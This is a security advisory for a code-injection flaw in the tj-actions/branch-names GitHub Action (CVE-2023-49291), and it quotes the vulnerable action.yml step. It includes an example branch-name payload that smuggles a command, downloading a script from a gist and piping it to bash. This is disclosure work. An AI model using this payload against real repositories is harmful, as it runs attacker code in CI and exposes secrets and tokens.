GHSA-8v8w-v8xg-79rf
Suggest an improvement- Source
- https://github.com/advisories/GHSA-8v8w-v8xg-79rf
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/12/GHSA-8v8w-v8xg-79rf/GHSA-8v8w-v8xg-79rf.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-8v8w-v8xg-79rf
- Aliases
- Published
- 2023-12-05T23:30:10Z
- Modified
- 2023-12-06T20:48:41Z
- Severity
-
- 9.3 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N CVSS Calculator
- Summary
- tj-actions/branch-names's Improper Sanitization of Branch Name Leads to Arbitrary Code Injection
- Details
-
Summary
The
tj-actions/branch-namesGitHub Actions references thegithub.event.pull_request.head.refandgithub.head_refcontext variables within a GitHub Actionsrunstep. The head ref variable is the branch name and can be used to execute arbitrary code using a specially crafted branch name.Details
The vulnerable code is within the
action.ymlfile therunstep references the value directly, instead of a sanitized variable.runs: using: "composite" steps: - id: branch run: | # "Set branch names..." if [[ "${{ github.ref }}" != "refs/tags/"* ]]; then BASE_REF=$(printf "%q" "${{ github.event.pull_request.base.ref || github.base_ref }}") HEAD_REF=$(printf "%q" "${{ github.event.pull_request.head.ref || github.head_ref }}") REF=$(printf "%q" "${{ github.ref }}")An attacker can use a branch name to inject arbitrary code, for example:
Test")${IFS}&&${IFS}{curl,-sSfL,gist.githubusercontent.com/RampagingSloth/72511291630c7f95f0d8ffabb3c80fbf/raw/inject.sh}${IFS}|${IFS}bash&&echo${IFS}$("foowill download and run a script from a Gist. This allows an attacker to inject a payload of arbitrary complexity.Impact
An attacker can use this vulnerability to steal secrets from or abuse
GITHUB_TOKENpermissions.Reference
- https://securitylab.github.com/research/github-actions-untrusted-input
- Database specific
{ "nvd_published_at": "2023-12-05T00:15:09Z", "cwe_ids": [ "CWE-20" ], "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2023-12-05T23:30:10Z" }- References
-
- https://github.com/tj-actions/branch-names/security/advisories/GHSA-8v8w-v8xg-79rf
- https://nvd.nist.gov/vuln/detail/CVE-2023-49291
- https://github.com/tj-actions/branch-names/commit/4923d1ca41f928c24f1c1b3af9daaadfb71e6337
- https://github.com/tj-actions/branch-names/commit/6c999acf206f5561e19f46301bb310e9e70d8815
- https://github.com/tj-actions/branch-names/commit/726fe9ba5e9da4fcc716223b7994ffd0358af060
- https://github.com/tj-actions/branch-names
- https://securitylab.github.com/research/github-actions-untrusted-input